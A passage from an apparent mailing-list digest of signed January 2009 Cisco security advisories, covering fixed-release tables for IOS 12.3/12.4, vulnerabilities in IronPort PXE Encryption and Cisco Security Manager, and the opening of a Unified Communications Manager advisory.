| 12.3T | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3TPC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3VA | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.3XB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XC | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XD | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.3XF | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XG | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XI | first fixed | 12.2(33)SB3 |
| | in 12.2SB | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XJ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XK | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XL | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XQ | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XR | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XS | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XU | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XW | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XX | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XY | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3XZ | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3YA | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YD | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YF | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YG | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YH | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YI | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YJ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YK | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YM | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YQ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YS | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YT | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YU | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YX | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3YZ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3ZA | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.4-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| 12.4 | 12.4(16) | 12.4(23) |
|------------+-------------+-------------|
| 12.4JA | 12.4(16b)JA | 12.4(16b) |
| | | JA1 |
|------------+-------------+-------------|
| 12.4JDA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4JK | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4JL | 12.4(3)JL1 | 12.4(3)JL1 |
|------------+-------------+-------------|
| 12.4JMA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4JMB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(16b) |
| 12.4JX | first fixed | JA1 |
| | in 12.4JA | |
|------------+-------------+-------------|
| 12.4MD | 12.4(15)MD | 12.4(15)MD2 |
|------------+-------------+-------------|
| 12.4MR | 12.4(16)MR | |
|------------+-------------+-------------|
| 12.4SW | 12.4(11)SW3 | 12.4(15)T8 |
|------------+-------------+-------------|
| 12.4T | 12.4(15)T | 12.4(15)T8 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XA | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XB | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XC | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XD | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XE | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.4XF | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XG | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XJ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XK | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.4XL | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XM | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XN | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XP | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4XQ | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XR | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XT | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.4XV | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | | 12.4(11) |
| | | XW10; |
| 12.4XW | 12.4(11)XW3 | Available |
| | | on |
| | | 22-JAN-2009 |
|------------+-------------+-------------|
| 12.4XY | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XZ | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4YA | Not | |
| | Vulnerable | |
+----------------------------------------+
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkluC58ACgkQ86n/Gc8U/uA6vACfY36eBjbCbnJsrnJlOCE0Mr6Y
JqUAn1TVyUvBk8lGTm94F+tvmZy4n3Ke
=cGUi
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: IronPort Encryption Appliance / PostX and
PXE Encryption Vulnerabilities
Advisory ID: cisco-sa-20090114-ironport
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
IronPort PXE Encryption is an e-mail encryption solution that is
designed to secure e-mail communications without the need for a
Public Key Infrastructure (PKI) or special agents on receiving
systems. When an e-mail message is targeted for encryption, the PXE
encryption engine on an IronPort e-mail gateway encrypts the original
e-mail message as an HTML file and attaches it to a notification
e-mail message that is sent to the recipient. The per-message key
used to decrypt the HTML file attachment is stored on a local
IronPort Encryption Appliance, PostX software installation or the
Cisco Registered Envelope Service, which is a Cisco-managed software
service.
PXE Encryption Privacy Vulnerabilities
+-------------------------------------
The IronPort PXE Encryption solution is affected by two
vulnerabilities that could allow unauthorized individuals to view the
contents of secure e-mail messages. To exploit the vulnerabilities,
attackers must first intercept secure e-mail messages on the network
or via a compromised e-mail account.
IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------
IronPort Encryption Appliance devices contain two vulnerabilities
that could allow unauthorized users to gain access to the IronPort
Encryption Appliance administration interface and modify other users'
settings. These vulnerabilities do not affect Cisco Registered
Envelope Service users.
Cisco has released free software updates that address these
vulnerabilities. There are no workarounds for the vulnerabilities
that are described in this advisory.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml
Affected Products
=================
Vulnerable Products
+------------------
The following IronPort Encryption Appliance/PostX versions are
affected by these vulnerabilities:
* All PostX 6.2.1 versions prior to 6.2.1.1
* All PostX 6.2.2 versions prior to 6.2.2.3
* All IronPort Encryption Appliance/PostX 6.2.4 versions prior to 6.2.4.1.1
* All IronPort Encryption Appliance/PostX 6.2.5 versions
* All IronPort Encryption Appliance/PostX 6.2.6 versions
* All IronPort Encryption Appliance/PostX 6.2.7 versions prior to 6.2.7.7
* All IronPort Encryption Appliance 6.3 versions prior to 6.3.0.4
* All IronPort Encryption Appliance 6.5 versions prior to 6.5.0.2
The version of software that is running on an IronPort Encryption
Appliance is located on the About page of the IronPort Encryption
Appliance administration interface.
Note: Customers should contact IronPort support to determine which
software fixes are applicable for their environment. Please consult
the Obtaining Fixed Software section of this advisory for more
information.
Products Confirmed Not Vulnerable
+--------------------------------
IronPort C, M and S-Series appliances are not affected by these
vulnerabilities. Although C-Series appliances can be configured to
use a local IronPort Encryption Appliance for per-message key
retention, the C-Series appliances are not vulnerable. The Cisco
Registered Envelope Service is not vulnerable.
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Note: IronPort tracks bugs using an internal system that is not
available to customers. The IronPort bug tracking identifiers are
provided for reference only.
PXE Encryption Privacy Vulnerabilities
+-------------------------------------
Individual PXE Encryption users are vulnerable to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. All the vulnerabilities require an attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or a compromised user e-mail account.
The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail
message without user interaction. Using the decryption key, an
attacker could decrypt the contents of the secure e-mail message.
This vulnerability is documented in IronPort bug 8062 and has been
assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0053.
By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.
IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------
The administration interface of IronPort Encryption Appliance devices
contains a cross-site request forgery (CSRF) vulnerability that could
allow an attacker to modify a user's IronPort Encryption Appliance
preferences, including their user name and personal security pass
phrase, if the user is logged into the IronPort Encryption Appliance
administration interface. Exploitation of the vulnerability will not
allow an attacker to change a user's password. This vulnerability is
documented in IronPort bug 5806 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0055.
The administration interface of IronPort Encryption Appliance devices
also contains a cross-site request forgery (CSRF) vulnerability that
could allow an attacker to execute a command and modify a user's
IronPort Encryption Appliance preferences, including their user name
and personal security pass phrase, under certain circumstances when a
user logs out of the IronPort Encryption Appliance administration
interface. Exploitation of the vulnerability will not allow an
attacker to change a user's password. This vulnerability is
documented in IronPort bug 6403 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0056.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062
CVSS Base Score - 7.1
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - None
Availability Impact - None
CVSS Temporal Score - 5.9
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
PXE Encryption Phishing Vulnerabilities - IronPort Bug 8149
CVSS Base Score - 6.1
Access Vector - Network
Access Complexity - High
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Partial
Availability Impact - None
CVSS Temporal Score - 5
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
IronPort Encryption Appliance CSRF Vulnerability - IronPort Bug 5806
CVSS Base Score - 5.8
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - None
CVSS Temporal Score - 4.8
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
IronPort Encryption Appliance Logout Action CSRF Vulnerability - IronPort Bug 6403
CVSS Base Score - 5.8
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - None
CVSS Temporal Score - 4.8
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
Impact
======
PXE Encryption Privacy Vulnerabilities
+-------------------------------------
Successful exploitation of these vulnerabilities could allow an
attacker to obtain user credentials and view the contents of
intercepted secure e-mail messages, which could result in the
disclosure of sensitive information.
IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------
Successful exploitation of these vulnerabilities could allow an
attacker to access user accounts on an IronPort Encryption Appliance
device, which could result in the modification of user preferences.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
Workarounds
===========
There are no workarounds for the vulnerabilities that are described
in this advisory.
There are mitigations available to help prevent exploitation of the
PXE Encryption phishing-style vulnerability. Phishing attacks can be
greatly reduced if DomainKeys Identified Mail (DKIM) and Sender
Policy Framework (SPF) are implemented on IronPort e-mail gateways to
help ensure message integrity and source origin. Additionally, the
PXE Encryption solution contains an anti-phishing Secure Pass Phrase
feature to ensure that secure notification e-mail messages are valid.
This feature is enabled by recipients when configuring their PXE user
profile. Cisco has released a best practices document that describes
several techniques to mitigate against the phishing-style attacks
that is available at the following link:
http://www.cisco.com/web/about/security/intelligence/bpiron.html
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. The affected products in this advisory are directly
supported by IronPort, and not via the Cisco TAC organization.
Customers should contact IronPort technical support at the link below
to obtain software fixes. IronPort technical support will assist
customers in determining the correct fixes and installation
procedures. Customers should direct all warranty questions to
IronPort technical support.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
http://www.ironport.com/support/contact_support.html
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities that are described in this advisory.
J.B. Snyder of Brintech reported a method for obtaining PXE
Encryption user credentials via a phishing-style attack to Cisco.
All other vulnerabilities were discovered by Cisco or reported by
customers.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iD8DBQFJbhoo86n/Gc8U/uARAjuxAJ4oLc1JjS7N9728Ueb6JB7Y2LVJtACfaSfA
A6WIz481vajHya3jIlp+/Xc=
=cFJ6
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Security Manager Vulnerability
Advisory ID: cisco-sa-20090121-csm
http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml
Revision 1.0
For Public Release 2009 January 21 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
Cisco Security Manager contains a vulnerability when it is used with
Cisco IPS Event Viewer (IEV) that results in open TCP ports on both
the Cisco Security Manager server and IEV client. An unauthenticated,
remote attacker could leverage this vulnerability to access the MySQL
databases or IEV server.
Cisco has released free software updates that address this
vulnerability. A workaround is also available to mitigate this
vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml
Affected Products
=================
Vulnerable Products
+------------------
All 3.1 and 3.2 versions prior to 3.2.2 of Cisco Security Manager are
affected by this vulnerability. Cisco IEV is installed with Cisco
Security Manager by default, but the vulnerability is not exposed
until IEV has been launched.
Products Confirmed Not Vulnerable
+--------------------------------
The following products have been confirmed not vulnerable:
* Cisco Security Manager 3.2.2
* Cisco Security Manager 3.0.x and earlier
* Standalone implementations of Cisco IEV
* Cisco IPS Manager Express
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
Cisco Security Manager is an enterprise-class management application
that is designed to configure firewall, VPN, and intrusion prevention
security services on Cisco network and security devices. As part of
Cisco Security Manager installation, the Cisco IEV is installed by
default. The IEV is a Java-based application that allows users to
view and manage alerts for up to five sensors, including the ability
to report top alerts, attackers, and victims over a specified number
of hours or days. Users can connect to and view alerts in real time
or via imported log files, configure filters and views to help manage
alerts, and import and export event data for further analysis.
A vulnerability exists in the Cisco Security Manager server. When the
IEV is launched, it opens several remotely available TCP ports on the
Cisco Security Manager server and client. These ports could allow
remote, unauthenticated root access to the IEV database and server.
When IEV is closed, it closes open ports on the Cisco Security
Manager client that launched the IEV but fails to close open ports on
the server. If the IEV has never been used on the system, the Cisco
Security Manager server is not vulnerable.
The IEV database contains events that are collected from Cisco
Intrusion Prevention System (IPS) devices. The IEV server allows an
unauthenticated user to add, delete, or modify the devices that are
added into the IEV.
This vulnerability is documented in Cisco Bug ID: CSCsv66897
This vulnerability have been assigned the Common Vulnerabilities and
Exposures (CVE) identifiers CVE-2008-3820.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsv66897: Cisco Security Manager/IEV: TCP Ports open for remote
connection without any authentication
CVSS Base Score - 8.8
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - None
CVSS Temporal Score - 7.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of this vulnerability may result in remote
root access to the IEV database or to the IEV Server. Upon launching
the IEV remotely accessible ports are opened on the Cisco Security
Manager server and the client where the IEV is launched. When the IEV
application is closed these ports are subsequently closed on the
client however remain open on the Cisco Security Manager server.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
A software patch for Cisco Security Manager versions 3.1, 3.1.1, 3.2
and 3.2.1 is available for download at:
http://www.cisco.com/cgi-bin/tablebuild.pl/csm-app?psrtdcat20e2
The patch file names by Cisco Security Manager version follow:
+------------------------------------------+
| Cisco | |
| Security | Patch Filename |
| Manager | |
| version | |
|-----------+------------------------------|
| 3.0.x and | Not Vulnerable |
| earlier | |
|-----------+------------------------------|
| 3.1 | CSM310PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.1.1.SP3 | CSM311SP3PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.2.SP2 | CSM320SP2PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.2.1.SP1 | CSM321SP1PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.2.2 | Not Vulnerable |
+------------------------------------------+
Please read the corresponding readme files for installation
instructions.
Workarounds
===========
In the event that Cisco IEV is not being used, administrators are
advised to disable the functionality until a patch is applied. To
disable IEV on Cisco Security Manager, perform the following steps:
1. Access the Microsoft Windows Server that Cisco Security Manager
is installed on.
2. Open the Services dialog box (Choose Start > Administrative Tools
> Services).
3. Locate the Cisco IPS Event Viewer service and open Properties.
4. Change Startup Type: to Disabled and click Ok.
5. Stop the Cisco IPS Event Viewer service.
6. Stop and Restart the Cisco Security Manager Daemon Manager
service.
7. Confirm that the Cisco IPS Event Viewer service has not
restarted.
Upon disabling the Cisco IPS Event Viewer service, the open ports
on the Cisco Security Manager server will be closed.
Additional mitigations that can be deployed on Cisco devices
within the network are available in the Cisco Applied Mitigation
Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090121-csm.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
=====================================
Cisco PSIRT is not aware of any public announcements or malicious use
of the vulnerability that is described in this advisory.
This vulnerability was discovered through internal Cisco testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-21 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkl3Q3QACgkQ86n/Gc8U/uCrVwCgjzYJzcc9npFzFfdAnudO1QYC
JvAAn1Ij4FRrttn3WjOHF+GthJw1x1+K
=5AmB
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Unified Communications Manager CAPF
Denial of Service Vulnerability
Advisory ID: cisco-sa-20090121-cucmcapf
Revision 1.0
For Public Release 2009 January 21 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Cisco Unified Communications Manager, formerly Cisco CallManager,
